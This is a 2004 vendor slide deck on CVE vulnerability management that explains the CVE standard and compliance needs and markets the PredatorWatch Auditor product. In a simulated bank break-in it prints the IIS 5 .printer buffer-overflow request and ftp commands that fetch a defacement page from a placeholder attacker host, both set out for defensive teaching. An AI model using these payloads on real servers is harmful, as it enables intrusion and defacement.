Proactive Network Security: Do You Speak CVE? Gary S. Miliefsky, CISSP®, FMDHS President & CEO, PredatorWatch, Inc. E-mail: garym@predatorwatch.com November 23, 2004 PredatorWatch, Inc. is a DoD Contractor About Me Gary S. Miliefsky Copyright © 2004 PredatorWatch, Inc. 20+ Security Veteran Computer Scientist CISSP® DHS is funding CVE® at MITRE (I am a founding member) Page 2 Behind the firewall…a gift from a friend? Copyright © 2004 PredatorWatch, Inc. Page 3 It Doesn’t Take a Rocket-Scientist Copyright © 2004 PredatorWatch, Inc. Page 4 Hackers Cause Risk of Non-compliance Government (Executive Order 13231) Legal (HIPAA, GLBA, E-SIGN) Health Care & Pharmaceutical (HIPAA and CFR FDA 21 - 11) Banking and Finance (E-SIGN, GLBA, FDIC Audits) Higher Education (Due Care and Tort Law) These markets are being heavily attacked by Hackers on a daily basis. Copyright © 2004 PredatorWatch, Inc. Page 5 If You Currently Have… Anti-Virus Software and a Solid Firewall Access through Virtual Private Network (VPN) Internet Service Provider (ISP) Spam Protection Local Browser/Email/JavaScript Protection Passwords for Email on Your Network Encryption Servers (IPSEC, SSL/TLS, HTTPS) Public Key Infrastructure (PKI)—Encryption Content Proxy (for filtering, Internet acceleration) Intrusion Detection or Prevention Systems (IDS or IPS) Copyright © 2004 PredatorWatch, Inc. Page 6 …Is Your Network Safe? In short, NO. These “solutions” don’t stop Hackers. Hackers take advantage of common vulnerabilities and exposures in your network. Firewalls can be hard to manage, so they may not protect you. And they don’t protect you from internal threats. Intrusion Detection Systems require human intervention and generate false results. Intrusion Prevention Systems may block legitimate access. Copyright © 2004 PredatorWatch, Inc. Page 7 Are You Stopping the Hackers? Anti-virus software can only protect against know viruses—it cannot stop hacker access! Passwords often don’t stop clever hackers, who use readily downloadable tools that crack them. Turning off JavaScript doesn’t stop a hacker from running other types of code on your system. Hackers can break into Virtual Private Networks (VPNs)—they aren’t always private! Firewalls can be points of entry for hackers. Copyright © 2004 PredatorWatch, Inc. Page 8 What Damage Can Hackers Cause? Denial of Service (DoS) Destruction of Data Theft of Data Damage to Your Reputation Put Your at Risk of Legal Liability Copyright © 2004 PredatorWatch, Inc. Page 9 Hackers Can Deny You Access Stop services—Vital programs you need to have running Kill the server—Bringing it down, forcing your network, even your company, to a halt Change the administrator password, locking out your system administrator and letting themselves in to key systems and files Copyright © 2004 PredatorWatch, Inc. Page 10 Hackers Can Destroy Data Crash your system or a node on the network, causing productivity issues and data loss Send garbage data to the system Defeat protocols that use date/time of day to gain access to the system Execute PHP code existing on the system Execute commands as administrator—erasing data, altering access—Creating havoc Copyright © 2004 PredatorWatch, Inc. Page 11 Hackers Can Steal Private Data Enter your network and retrieve system info Read sensitive files on the system Get version numbers of installed software and attack using that information Obtain access to accounts and private data Copyright © 2004 PredatorWatch, Inc. Page 12 Serious Network Protection —How Do You Keep out the Hackers? Analyzes Your Network’s Vulnerabilities on a Regular Basis (CVEs) Regularly Review Those Vulnerabilities (CVEs) Tune your Firewall against CVE exploits Harden your Assets by Removing CVEs Make Sure Your Methods are “Tamper-proof” Optimized Model Automation of this process is patent-pending by PredatorWatch, Inc. Copyright © 2004 PredatorWatch, Inc. Page 13 What is the CVE Standard? Common Vulnerabilities and Exposures (CVE) is a list or dictionary that provides common names for publicly known information security vulnerabilities and exposures. Using a common name makes it easier to share data across separate databases and tools that until now were not easily integrated. This makes CVE the key to information sharing. If a report from one of your security tools incorporates CVE names, you may then quickly and accurately access fix information in one or more separate CVE-compatible databases to remediate the problem. CVE is: One name for one vulnerability or exposure One standardized description for each vulnerability or exposure A dictionary rather than a database How disparate databases and tools can "speak" the same language The way to interoperability and better security coverage A basis for evaluation among tools and databases Accessible for review or download from the Internet Industry-endorsed via the CVE Editorial Board Copyright © 2004 PredatorWatch, Inc. Page 14 PredatorWatch is CVE Compatible Left to right: Lawrence C. Hale, U.S. Department of Homeland Security, Deputy Director, US-CERT delivers 3 CVE Mitre Compliance Certificates to PredatorWatch, Inc. at CSI, Nov 8, 2004, Washington, D.C. Gary S. Miliefsky, CISSP, FMDHS, CEO, PredatorWatch, Inc. Doug Eames, VP of Sales, PredatorWatch, Inc. Copyright © 2004 PredatorWatch, Inc. Page 15 Keep Up to Date on CVEs Visit http://cve.mitre.org Keep an eye on the SANS/FBI top 20 CVE list http://www.sans.org/top20/ Test for the latest CVEs on a daily basis Report on your CVEs on a daily, weekly or monthly basis (DUE DILIGENCE) Remove all CVEs that you possibly can (DUE CARE) Block at the Firewall (INCREASE UPTIME) Copyright © 2004 PredatorWatch, Inc. Page 16 E-commerce Real World Scenario: 1. What if you were the CEO, CFO, CIO or CSO of an E-commerce Merchant or a Brick & Mortar Retailer using an Internet Payment Gateway System? 2. What if you had only one CVE in your system? 3. What if anyone could exploit it in 5 minutes? CVEs in e-Commerce VISA Announces vulnerability audit requirements (CISP) Over 21,000-member financial institutions, VisaNet processes over 2,700 transactions/sec during peak season. MasterCard requires Quarterly CVE Audits beginning 6/2004 (SDP) 7% of all of MasterCard's $921.6 billion annual card purchases take place on web Now AMEX (DSS) and Discover (DISC) have launched Audit requirement programs. Soon, all e-Commerce Merchants must detect/remove critical CVEs to do business on line (see page 49 of MasterCard SDP PDF for example) SOURCE: COMPUTERWORLD, April 14, 2004 Copyright © 2004 PredatorWatch, Inc. Page 18 What You Should Do To Comply 1. Build Corporate Security Policies that are ISO17799 compliant: American Express DSS DiscoverCard DISC MasterCard SCP VISA CISP 2. Audit and Report on CVEs Required by all Credit Card Companies Copyright © 2004 PredatorWatch, Inc. Page 19 What Is The ISO 17799 Standard? 10 Sections Security Policy – To provide management direction & support for information security Organizational Security – Manage information security within the organization Asset Classification and Control – To maintain appropriate protection of organizational assets Personnel Security – To reduce the risk of human error, theft, fraud or misuse of facilities Physical & Environmental Security – To prevent unauthorized access, damage and interference to business premises and information Communications and Operations Management – To ensure the correct and secure operations of information processing facilities Access Control – Control access to information System Development and Maintenance – To ensure security is built into information systems Business Continuity Management – To counteract interruptions to business activities and to protect critical business processes from the effects of major failures or disasters Compliance – To avoid breaches of any criminal and civil law, statutory, regulatory or contractual Copyright © 2004 PredatorWatch, Inc. Page 20 Online Banking Real World Scenario: 1. What if you were the CEO, CFO, CIO or CSO of Fidelity Trust Bank with $1B under management? 2. What if you had only one CVE in your system? 3. What if anyone could exploit it in 5 minutes? Welcome to FidelityTrustBank.com Copyright © 2004 PredatorWatch, Inc. Page 22 FidelityTrustBank.com has CVEs Copyright © 2004 PredatorWatch, Inc. Page 23 Objectives: Find and Remove CVEs “The most important step towards securing your network is to shrink the window of vulnerability as close to zero as possible. No vulnerabilities means no place to hack.” If you don’t: Hackers will take advantage of you. Copyright © 2004 PredatorWatch, Inc. Page 24 Hacking an Online Bank – The Break In Do NOT try this at home. It’s Illegal. The break-in (excerpt from CNET News.com: http://news.com.com/20091017-893228.html): “One strategy is to attack the hardware itself, exploiting notoriously glitchprone Web systems to gain access to the servers running the bank's online operations. "Most banks run Unix Web servers or Microsoft IIS (Internet Information Server), and both are prone to remote attacks that can allow a hacker to take control of the server itself," said David Ahmad, the moderator of the Bugtraq mailing list, one of the leading e-mail lists dedicated to reports of software vulnerabilities. Companies including financial institutions subscribe to the list. In April, Microsoft issued a security patch to plug 10 new holes that could allow hackers to take full control of computers running the company's IIS program.” Copyright © 2004 PredatorWatch, Inc. Page 25 The Break In (continued) “In seizing control of a server, security experts say, a hacker can also modify any trusted applications to perform malicious operations. An attack that manipulates such internal applications is more likely to escape notice by the network's electronic guards. "Intrusion-detection systems only spot known attacks or behaviors that indicate a certain class of attack," Ahmad said. "Attacks against a server might be detected, but a complex applicationbased attack might look like normal behavior." Financial institutions do make it difficult for employees to move money, but their systems must be flexible enough to work with customers who are not subject to the same level of scrutiny. This could allow an insider to create a fake customer transaction and authorization to shepherd the money right out of a system. “ – CNET News.com Copyright © 2004 PredatorWatch, Inc. Page 26 Hacking Methodology – Exploit CVEs Footprint Scan In this presentation, I will assume that the first Enumerate two steps have been done by PredatorWatch Penetrate Focus of this presentation, with Escalate only one specific example Pillage Get Interactive Expand influence Deface Website and Steal Database from simulated Bank Cleanup (Denial of Service) Copyright © 2004 PredatorWatch, Inc. Page 27 Common IIS 5 Attacks Against CVEs Here are the most dangerous IIS 5 attacks currently: Hackers take Buffer overflows advantage of this flaw in the online File System Traversal Bank Script source revelation Copyright © 2004 PredatorWatch, Inc. Page 28 Buffer Overflow CVE in IIS v5.0 CVE-2001-0241 CVE Version: 20040901 This is an entry on the CVE list, which standardizes names for security problems. It was reviewed and accepted by the CVE Editorial Board before it was added to CVE. Name: CVE-2001-0241 Description: Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0. Copyright © 2004 PredatorWatch, Inc. Page 29 CVE In Detail: IIS Buffer Overflow: IPP Internet Printing Protocol (IPP) functionality is implemented in IIS 5 via an ISAPI filter (C:\WINNT\System32\msw3prt.dll) This functionality is enabled by default Malformed requests for .printer files invoke this ISAPI and cause a buffer overflow, resulting in remote SYSTEM privileges Copyright © 2004 PredatorWatch, Inc. Page 30 CVE Exploit: IIS Buffer Overflows: IPP Simple to exploit: GET /null.printer HTTP/1.0 Host: [> 420 char. buffer] Copyright © 2004 PredatorWatch, Inc. Page 31 Deface Online Bank (Simulation) Before After C:\>ftp [hacker-ip] C:\>get hack-index.html C:\>rename index.html Copyright © 2004 PredatorWatch, Inc. Page 32 IIS5 Attack Countermeasures 1. IIS5 Checklist (microsoft.com/security) 2. Visit http://www.windowsupdate.com on a regular basis 3. Install all necessary security and system patches as required Repeat Steps 1-3 Religiously! Copyright © 2004 PredatorWatch, Inc. Page 33 Recommends… THIS ONE IS CRITICAL Copyright © 2004 PredatorWatch, Inc. Page 34 Get Computer Updates… …Means CVE Management Every day there is a new CVE (Common Vulnerability and Exposure) see http://cve.mitre.org This website /\ is The homepage for helping you stop hackers and harden your assets. Why? By knowing the CVEs, if you find a system with a CVE, then you can find a way to block an exploit that would impact this asset. Copyright © 2004 PredatorWatch, Inc. Page 35 Protect Against CVE Exploiters Detect and Track Assets Policy – What to do if offline, I/O, VPN, etc. Process – Equip I/O, Laptops, etc. Audit your Network for CVEs: Careful with free tools – may DoS yourself! Lock The Doors against CVE Exploits Manage your firewall, daily. Cleanup your CVEs Copyright © 2004 PredatorWatch, Inc. Page 36 Protect Against CVE Exploiters Detect and Track Assets Laptops in and out of the office Personal computer or Company asset? Firewall, Antivirus, Antispyware, Patches up to date? Inbound scan for CVEs – high risk? then quarantine. Wireless Routers/LANs How many in the building? Encrypted? Authenticated? Servers and other equipment Something new on the LAN? Who owns it? Something offline repeatedly? Why? Copyright © 2004 PredatorWatch, Inc. Page 37 Protect Against CVE Exploiters Audit your Network for CVEs: Find a tool you like… Google “Laptop Auditor” or “Security Auditor” Do an eval of Open Source vs Turnkey If you built your Firewall from scratch – go for Open Source, else, find a Company you can work with and trust. Pick a tool that doesn’t take any assets offline Scans and reports on CVEs Copyright © 2004 PredatorWatch, Inc. Page 38 Protect Against CVE Exploiters Lock The Doors against CVE Exploits Review logs – look for suspicious traffic Make sure you setup the VPN interface properly and know who’s using it and if they are coming in through a secure tunnel on an insecure or ‘sick’ computer Block ports for all inbound/outbound that you don’t use – 445 was exploited by MSBlast and Sasser. Do you need it open? Look at the computers that have CVEs – how long to fix and what port is it on? Update your rules table until it is fixed. Don’t trust all patches. Reinspect for same or new CVEs Keep repeating this process, daily. Copyright © 2004 PredatorWatch, Inc. Page 39 Protect Against CVE Exploiters Cleanup your CVEs Remember the IIS 5.0 vulnerability? Did the patch fix it? Yes, good. No? Then, why not shut off the web-based print server feature of the IIS server – one quick configuration change and no CVE to exploit. Some CVEs can be patched Others required intelligent reconfiguration Security by Obscurity (usually a no-no) may actually delay a successful attack against a CVE until you have a chance to shut down the service, update the firewall rules table or fix the CVE. Copyright © 2004 PredatorWatch, Inc. Page 40 Introducing PredatorWatch Auditor™… AN INDUSTRY FIRSTCLIENTLESS QUARANTINE SYSTEM Auditor™ is the world’s first clientless quarantine system that drives firewalls to do a better job, while at the same time, enables IT Managers, Network Security Consultants and Managed Security Service Providers (MSSPs) to harden networks and show best practices for regulatory compliance. Copyright © 2004 PredatorWatch, Inc. Page 41 PredatorWatch Auditor™ Automates… Detection and Tracking of Assets Auditing your Network for CVEs: Locking The Doors against CVE Exploits Cleanup your CVEs Copyright © 2004 PredatorWatch, Inc. Page 42 Auditor™ Features n n n n n n n n n World’s Fastest CVE® Vulnerability Assessment Engine Secure Vulnerability Update Server Dynamic Rogue Wireless and Laptop Detector Immediate Audits and On Demand Audits Patent-pending FirewallBooster™ for major firewalls PatchBooster™ for Microsoft® SUS Asset Tracker with built-in MAC/IP Tracker™ Security Policy Builder with ISO®17799 Templates Patent-pending Regulatory Compliance Reporter Copyright © 2004 PredatorWatch, Inc. Page 43 Auditor™ Benefits n Automatically detects, audits, quarantines and remediates against all your computers, servers, desktops, laptops, network equipment and wireless routers by tight integration with the firewall. n Protects your network behind the firewall from common vulnerabilities and exposures, through frequent, rapid and automated vulnerability assessment, patch management and remediation. n Extending the timetable to remediate, by automatically reconfiguring the firewall at port and IP level, allowing organizations to patch during normally scheduled maintenance windows, rather than during inconvenient and costly intervals. n Helps enforce policy and ensure regulatory compliance by constantly auditing corporate security standard configurations to reduce risk. Copyright © 2004 PredatorWatch, Inc. Page 44 What Analysts Are Saying… The missing link in network security, behind the firewall, for the small to medium size enterprise. – James Hurley, Vice President, Security & Privacy Research The laptop and wireless detection and quarantine feature is unique. – Chris Shipley, Executive Producer, DemoMobile Finally, a turnkey security solution that really works for the SME marketplace. – Jon Oltsik, Senior Analyst It’s a streamlined vulnerability management solution with features of a CIO in a box. – Charles Kolodgy, Research Director, Security Products A powerful security solution that is simple to use, easy to deploy and requires little to no training. – Phebe Waterfield, Security Analyst Copyright © 2004 PredatorWatch, Inc. Page 45 …And Partners Auditor™ turns an IBM xSeries into a powerful security appliance. - Jim Stallings, Senior Vice President ... a phenomenal technology/solution. Simply amazing! - David Trudeau, Director of Sales Copyright © 2004 PredatorWatch, Inc. Page 46 …And Customers Banking/GLBA Insurance/HIPAA “Inside our firewall, our Auditor™ security appliance detects and diagnoses potential security flaws that could cause our bank to be at risk of FDIC IT Security Audit and GLBA noncompliance…We are very pleased with the Auditor™.” - Steve Irish, CIO, Enterprise Bank & Trust Co. “With Auditor™ on our network, we get regular validation that we are protected against attack and enjoy a significant increase in security.” - William Tyson, SVP, AGIA Education/E-Sign “...it is quite common for faculty/staff/students to plug into computer system without my knowledge... Auditor™ gives me the ability to get a quick inventory of which systems are new to the network and automatically quarantine those that are at risk.” - Kenneth Kleiner, Systems & Network Manager, UMASS Lowell Copyright © 2004 PredatorWatch, Inc. Page 47 We Are The Technology Leader… 1. The only Vulnerability Management player to develop the patentpending Firewall Booster™ technology to tie and unify Firewall and Vulnerability Management together. 2. The first to dynamically detect rogue and high risk assets (mobile & wireless) and intelligently quarantine at the Firewall. 3. The only Vulnerability Management player to expand into Enterprise Security Management with asset management, policy building, patch boosting and regulatory compliance reporting. 4. The first and only to fit on a Compact Flash, a 1U and the IBM BladeCenter. PredatorWatch, Inc. Copyright © 2004 PredatorWatch, Inc. Page 48 Questions? Note: Click the logo (above) to visit our Company website. Copyright © 2004 PredatorWatch, Inc. Page 49